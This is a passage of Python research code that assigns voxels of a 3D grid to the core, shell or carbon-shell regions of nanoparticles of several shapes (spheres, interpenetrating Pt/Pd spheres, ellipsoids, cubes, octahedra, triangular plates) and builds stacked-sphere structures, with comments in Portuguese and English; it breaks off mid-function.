def incoreshell_interpenesphere(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z,rcarbonpt,radiuspt,rcarbonpd,radiuspd,distcentro,alloynumber):
div=float(radiusc/dl)
aa=0
# FIRST ELEMENT!
if(radiuspt>radiuspd):
largerr = rcarbonpt
else:
largerr = rcarbonpd
xx1 = ((radiuspt + (largerr-radiuspt))/dl-i);
# xx1 = ((radiuspt + (rcarbonpt-radiuspt))/dl-i);
yy1 = ((radiuspt+(rcarbonpt-radiuspt))/dl-j);
zz1 = ((radiuspt+(largerr-radiuspt))/dl-k+1);
# print(xx1)
# FIRST ELEMENT SHELL
xx2 = ((radiuspt+(largerr-radiuspt))/dl-i)
# xx2 = ((radiuspt+(rcarbonpt-radiuspt))/dl-i)
yy2 = ((radiuspt+(rcarbonpt-radiuspt))/dl-j)
zz2 = ((radiuspt+(largerr-radiuspt))/dl-k+1)
# SECOND ELEMENT !
xx3 = ((radiuspd+(largerr-radiuspd))/dl-i+1)
# xx3 = ((radiuspd+(rcarbonpd-radiuspd))/dl-i+1)
yy3 = ((radiuspd+(rcarbonpd-radiuspd)+distcentro)/dl-j+1)
zz3 = ((radiuspd+(largerr-radiuspd))/dl-k+1)
# SECOND ELEMENT SHELL
xx4 = ((radiuspd+(largerr-radiuspd))/dl-i+1)
# xx4 = ((radiuspd+(rcarbonpd-radiuspd))/dl-i+1)
yy4 = ((radiuspd+(rcarbonpd-radiuspd)+distcentro)/dl-j+1)
zz4 = ((radiuspd+(largerr-radiuspd))/dl-k+1)
em=1
if (distcentro>rcarbonpt+rcarbonpd):
if ( ((xx1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2) <= (((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2) ):
index=corenumber
aa=1
# print (aa)
elif ((xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2 >= ((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2
and (xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2 <= 1.0):
index=cnum
aa=1
elif ((xx3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2<=((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2):
index=shellnumber
aa=1
elif ((xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2 >= ((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2
and (xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2 <= 1.0):
index=cnum
aa=1
if (em == 1 and (xx1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2<=((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2
and (xx3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2>((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2
and (((xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2)+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2>1.0 or (xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2
+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2<(((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2) ) ) :
index=corenumber
aa=1
em=1
#xy(i,j+(k-1)*(Dy1))=1
elif (em == 1 and (xx1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2
+(zz1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2<=((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2
and ((xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2>=((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2
and (xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2
+(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2<=1.0)):
em=1
index=corenumber
aa=1
#xy(i,j+(k-1)*(Dy1))=1
elif (em == 1 and (xx1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2
+(zz1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2<=((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2
and (xx3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2
+(zz3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2<=((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2):
em=1
index=alloynumber
aa=1
#xy(i,j+(k-1)*(Dy1))=3
# NOW FOR PT CARBON SHELL, i changed here
if ((em == 1 and (xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2
+(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2>=((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2
and (xx2/((radiuspt + (rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2<= 1.0 and (xx3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(yy3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2>=((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2
and (((xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2<=((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2 )
or ((xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2)>=1.0))):
em=1
index= cnum
aa=1
#xy(i,j+(k-1)*(Dy1))=4
elif (em == 1 and (xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2 >=((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2
and (xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2<= 1.0
and (xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2 +
(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2>=((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2
and (xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2<=1.0):
em=1
index=cnum
aa=1
#xy(i,j+(k-1)*(Dy1))=4
elif (em == 1 and (xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2 >=((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2
and (xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2 <= 1.0
and (xx3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2<=(((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2) ):
em=1
index= shellnumber
aa=1
#xy(i,j+(k-1)*(Dy1))=2
# just PD SPHERE! i changed here
if (em == 1 and (xx3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2<=((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2
and (xx1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2>((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2
and (((xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2< ((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2
or ((xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2>1.0)))):
em=1
index=shellnumber
aa=1
#xy(i,j+(k-1)*(Dy1))=2
# JUST PD CARBON SHELL, i changed here
if ((em == 1 and (xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2 >=((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2
and (xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2 <= 1.0 and (xx1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(yy1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2>((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2
and ( ((xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2 < ((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2 )
or (( (xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
((zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2) > 1.0))))):
em=1
index=cnum
aa=1
#xy(i,j+(k-1)*(Dy1))=4
if(aa==0):
index=0
if(aa==1):
pass
# print (index,'index')
return index,aa
return index,aa
###########################################################################################################################
###########################################################################################################################
# fazer uma função que determine se a posição x,y,z está dentro do core-shell
# this function is to generate spherical nanoparticles
def incoreshell_ellipsoid(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
div1=float(radiusxcs/dl)
div2=float(radiusycs/dl)
div3=float(radiuszcs/dl)
# x[ii]= float((((float((1-(g-1)*sqrt(3.0)+Npiy)))*div-i+2)))
# y[ii]= float(((float((-1+1-(g-1)+2*(w-1)+Npiy))*div-j)+2))
# z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
# print (x[ii])
aa=0
if ( ((x[ii]/(div1))**2+(y[ii]/(div2))**2+(z[ii]/(div3))**2) <= (((float(radiuscore))/(float(radiusc)))**2) ):
# A[a][b]=corenumber
index=corenumber
aa=1
# shell
if ( (((x[ii]/(div1))**2+(y[ii]/(div2))**2+ (z[ii]/(div3))**2) >= (((float(radiuscore))/(float(radiusc)))**2)) and (((x[ii]/(div1))**2+(y[ii]/(div2))**2+ (z[ii]/(div3))**2) <= (((float(radiusshell))/(float(radiusc)))**2))):
# A[a][b]=shellnumber
index=shellnumber
aa=1
# carbon shell
if ( (((x[ii]/((div1)))**2+(y[ii]/((div2)))**2+ (z[ii]/((div3)))**2) >= (((float(radiusshell))/(float(radiusc)))**2)) and (((x[ii]/((div1)))**2+(y[ii]/((div2)))**2+ (z[ii]/((div3)))**2) <= ((1.0)**2))):
# A[a][b]=cnum
index=cnum
aa=1
if(aa==0):
index=0
if(aa==1):
pass
# print (index,'index')
return index,aa
###########################################################################################################################
###########################################################################################################################
# fazer uma função que determine se a posição x,y,z está dentro do core-shell
# this function is to generate cubic nanoparticles
def incoreshell_cubic(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z):
div=float(radiusc/dl)
# print (x[ii])
aa=0
# core
acore=(x[ii]/(div))**2 <= (((float(radiuscore))/(float(radiusc)))**2) and (y[ii]/(div))**2 <= (((float(radiuscore))/(float(radiusc)))**2) and (z[ii]/(div))**2<= (((float(radiuscore))/(float(radiusc)))**2)
if ( acore ):
# A[a][b]=corenumber
index=corenumber
aa=1
# shell
# a1x= (x[ii]/(div))**2>= ((float(radiuscore))/(float(radiusc)))**2 and (x[ii]/(div))**2<= ((float(radiusshell))/(float(radiusc)))**2
# a1y= (y[ii]/(div))**2 >= ((float(radiuscore))/(float(radiusc)))**2 and (y[ii]/(div))**2 <= ((float(radiusshell))/(float(radiusc)))**2
# a1z= (z[ii]/(div))**2 >= ((float(radiuscore))/(float(radiusc)))**2 and (z[ii]/(div))**2 <= ((float(radiusshell))/(float(radiusc)))**2
ashell= (x[ii]/(div))**2<= ((float(radiusshell))/(float(radiusc)))**2 and (y[ii]/(div))**2 <= ((float(radiusshell))/(float(radiusc)))**2 and (z[ii]/(div))**2 <= ((float(radiusshell))/(float(radiusc)))**2
if ( ashell and acore==False):
# if ( 1==1):
# A[a][b]=shellnumber
index=shellnumber
aa=1
# carbon shell
# a1= (x[ii]/(div))**2>= ((float(radiusshell))/(float(radiusc)))**2 and (y[ii]/(div))**2 >= ((float(radiusshell))/(float(radiusc)))**2 and (z[ii]/(div))**2 >= ((float(radiusshell))/(float(radiusc)))**2
# a2= (x[ii]/(div))**2<=1.0 and (y[ii]/(div))**2 <= 1.0 and (z[ii]/(div))**2 <= 1.0
acarbon=(x[ii]/(div))**2<=1.0 and (y[ii]/(div))**2 <= 1.0 and (z[ii]/(div))**2 <= 1.0
if ( ashell==False and acarbon==True):
# A[a][b]=cnum
index=cnum
aa=1
if(aa==0):
index=0
if(aa==1):
pass
# print (index,'index')
return index,aa
###########################################################################################################################
###########################################################################################################################
# fazer uma função que determine se a posição x,y,z está dentro do core-shell
# this function is to generate octahedrical nanoparticles
def incoreshell_octahedron(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z):
div=float(radiusc/dl)
# print (x[ii])
aa=0
# core
acore=abs(x[ii]/(div))+abs(y[ii]/(div))+abs(z[ii]/(div))<= (((float(radiuscore))/(float(radiusc)))**2)
if ( acore ):
# A[a][b]=corenumber
index=corenumber
aa=1
# shell
ashell= abs(x[ii]/(div))+abs(y[ii]/(div))+abs(z[ii]/(div))<= (((float(radiusshell))/(float(radiusc)))**2)
if ( ashell and acore==False ):
# A[a][b]=shellnumber
index=shellnumber
aa=1
# carbon shell
acarbon= abs(x[ii]/(div))+abs(y[ii]/(div))+abs(z[ii]/(div))<= (((float(radiusc))/(float(radiusc)))**2)
if ( acarbon and ashell == False ):
# A[a][b]=cnum
index=cnum
aa=1
if(aa==0):
index=0
if(aa==1):
pass
# print (index,'index')
return index,aa
###########################################################################################################################
###########################################################################################################################
# fazer uma função que determine se a posição x,y,z está dentro do core-shell
# this function is to generate octahedrical nanoparticles
def incoreshell_triplate(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z,base,width,height,base2,width2,cs):
#### here are described the equations to form a triangular plate nanoparticle
### it must be repaired
div=float(radiusc/dl)
basenew= base2+cs
widthnew=width2+cs
aa=0
acore1=False
acore2=False
if( y[ii]/div <= width/(2*widthnew)+abs(x[ii]/div)*(width*(basenew)/base*(widthnew)) and y[ii]>=0):
# print (x[ii],base/2)
acore1=True
# print (x[ii],base/2)
# x[ii]= float((((float(2.0*(g-1)+1+(h-1)))*float(radiusc)/float(dl)-float(i)
# if( (x[ii]+float(i))/div <=x[ii]/div<= base/(2*basenew)):
# if( (y[ii]+float(j))/div <=width/widthnew-i*(2*width*(basenew)/(base*widthnew))):
# print (x[ii],base/2)
# acore1=True
# if( -base/(2*basenew) <= x[ii]/div <= 0 ):
# if( y[ii]/div <=width/widthnew+(x[ii]/div)*(2*width*(basenew)/(base*widthnew))):
# acore2= True
#
acore2=False
if ( acore1 or acore2 ):
# print (x[ii],base/2)
# A[a][b]=corenumber
index=corenumber
index=0
aa=1
# print(index)
ashell1=False
ashell2=False
if( 0 <=x[ii]<= base2/2):
if( y[ii]<=width2-x[ii]*(2*width2/base2)):
ashell1=True
if( -base2/2 <= x[ii] <= 0 ):
if( y[ii]<=width2+x[ii]*(2*width2/base2)):
ashell2= True
aant=True
if (acore1==False and acore2==False):
aant=False
if ( ashell1 or ashell2 and ( aant==False) ):
# A[a][b]=corenumber
index=shellnumber
aa=1
# print(index)
acnum1=False
acnum2=False
basenew= base2+cs
widthnew=width2+cs
if( 0 <=x[ii]<= basenew/2):
if( y[ii]<=widthnew-x[ii]*(2*widthnew/basenew)):
acnum1=True
if( -base2/2 <= x[ii] <= 0 ):
if( y[ii]<=widthnew+x[ii]*(2*widthnew/basenew)):
acnum2= True
aant=True
if (ashell1==False and ashell2==False):
aant=False
if ( acnum1 or acnum2 and ( aant==False) ):
# A[a][b]=corenumber
index=cnum
index=0
aa=1
# print(index)
# shell
# print (x[ii])
# core
if(aa==0):
index=0
if(aa==1):
pass
# print (index,'index')
# print(index)
return index,aa
###########################################################################################################################
# condições iniciais dos arrays criados
def zeroarray(Npix,Npiy,Ntam):
#jj=1
#w=Npiy
#g=Npix
if(Npix>Npiy):
Nmaior=Npix
else:
Nmaior=Npiy
Npart=0
for h in range(0,(Nmaior+1)):
Npart=Npart+Nmaior**2
Npartz=0
for h in range(0,(Ntam+1)):
Npartz=Ntam+h**2
if(Npart> Npartz):
pass
else:
Npart=Npartz
# print Npart,'Npart'
x= [0 for i in range(Npart+1)]
y= [0 for i in range(Npart+1)]
z= [0 for i in range(Npart+1)]
return [x, y, z, Npart] #=[x,y,z,Npart]
#[x, y, z, Npart] = zeroarray(10, 1)
###########################################################################################################################
### cria matriz e zera ela
def zeromatrix(Dx1,Dy1,Dz1):
mult=(Dy1)*(Dz1)
#print (Dx1)
A= [[0 for i in range(mult+1)] for j in range(Dx1+1)]
#print A[Dx1][mult]
#print len(A)
#A=[[]]
for k in range(1,(Dz1+1)):
for j in range(1,(Dy1+1)):
for i in range(1,Dx1+1):
A[i][j+(k-1)*Dy1]=0
# A[i][j]=0
# print i
return A
###########################################################################################################################
# função ou classe que descreve qual geometria vai ser escolhida.
# primeiramente será feito com funções
def jonderstruct1 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs):
w=0
g=0
h=0
# print(corenumber,'aqui')
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
ii=1
#############
xx1=((1)*float(radiusc/dl)-i+1)
yy1= ((1)*float(radiusc/dl)-j+1)
zz1=(float(radiusc/dl)-k+1)
xx2=((1.0)*float(radiusc/dl)-i+1)
yy2= ((3.0)*float(radiusc/dl)-j+1)
zz2=(float(radiusc/dl)-k+1)
xx3=((3.0)*float(radiusc/dl)-i+1)
yy3= ((1.0)*float(radiusc/dl)-j+1)
zz3=(float(radiusc/dl)-k+1)
xx4=((3.0)*float(radiusc/dl)-i+1)
yy4= ((3.0)*float(radiusc/dl)-j+1)
zz4=(float(radiusc/dl)-k+1)
#!!! second layer, one sphere
xx5=((2.0)*float(radiusc/dl)-i+1)
yy5= ((2.0)*float(radiusc/dl)-j+1)
zz5=((sqrt(2.0)+1.0)*float(radiusc/dl)-k+1)
#!!! third layer, four spheres
xx6=(1*float(radiusc/dl)-i+1)
yy6= (1*float(radiusc/dl)-j+1)
zz6=((sqrt(3.0)+2.0)*float(radiusc/dl)-k+1)
xx7=(1*float(radiusc/dl)-i+1)
yy7= (3*float(radiusc/dl)-j+1)
zz7=((sqrt(3.0)+2.0)*float(radiusc/dl)-k+1)
xx8=(3*float(radiusc/dl)-i+1)
yy8= (1*float(radiusc/dl)-j+1)
zz8=((sqrt(3.0)+2.0)*float(radiusc/dl)-k+1)
xx9=(3*float(radiusc/dl)-i+1)
yy9= (3*float(radiusc/dl)-j+1)
zz9=((sqrt(3.0)+2.0)*float(radiusc/dl)-k+1)
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print radiuscore,radiusshell,radiusc
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
ii=ii+1
return A
###########################################################################################################################
###########################################################################################################################
def jonderstruct2 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs):
w=0
g=0
h=0
# print(corenumber,'aqui')
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
ii=1
xx1=((1.0)*float(radiusc/dl)-i+1)
yy1= ((1.0)*float(radiusc/dl)-j+1)
zz1=(float(radiusc/dl)-k+1)
xx2=((2.0+sqrt(3.0))*float(radiusc/dl)-i+1)
yy2= ((1.0)*float(radiusc/dl)-j+1)
zz2=(float(radiusc/dl)-k+1)
xx3=((1.0)*float(radiusc/dl)-i+1)
yy3= ((2.0+sqrt(3.0)) *float(radiusc/dl)-j+1)
zz3=(float(radiusc/dl)-k+1)
xx4=((2+sqrt(3.0))*float(radiusc/dl)-i+1)
yy4= ((2+sqrt(3.0))*float(radiusc/dl)-j+1)
zz4=(float(radiusc/dl)-k+1)
xx5=((1.0+sqrt(2.0))*float(radiusc/dl)-i+1)
yy5= ((1.0+sqrt(2.0))*float(radiusc/dl)-j+1)
zz5=(float(radiusc/dl)-k+1)
#!!!!
xx6=(1.0*float(radiusc/dl)-i+1)
yy6= (1.0*float(radiusc/dl)-j+1)
zz6=((2+sqrt(3.0))*float(radiusc/dl)-k+1)
xx7=((2+sqrt(3.0))*float(radiusc/dl)-i+1)
yy7= (1*float(radiusc/dl)-j+1)
zz7=((2+sqrt(3.0))*float(radiusc/dl)-k+1)
xx8=((1+sqrt(2.0))*float(radiusc/dl)-i+1)
yy8= ((1)*float(radiusc/dl)-j+1)
zz8=((1+sqrt(2.0))*float(radiusc/dl)-k+1)
xx9=((1.0)*float(radiusc/dl)-i+1)
yy9= ((2+sqrt(3.0))*float(radiusc/dl)-j+1)
zz9=((2+sqrt(3.0))*float(radiusc/dl)-k+1)
xx10=((2+sqrt(3.0))*float(radiusc/dl)-i+1)
yy10= ((2+sqrt(3.0))*float(radiusc/dl)-j+1)
zz10=((2+sqrt(3.0))*float(radiusc/dl)-k+1)
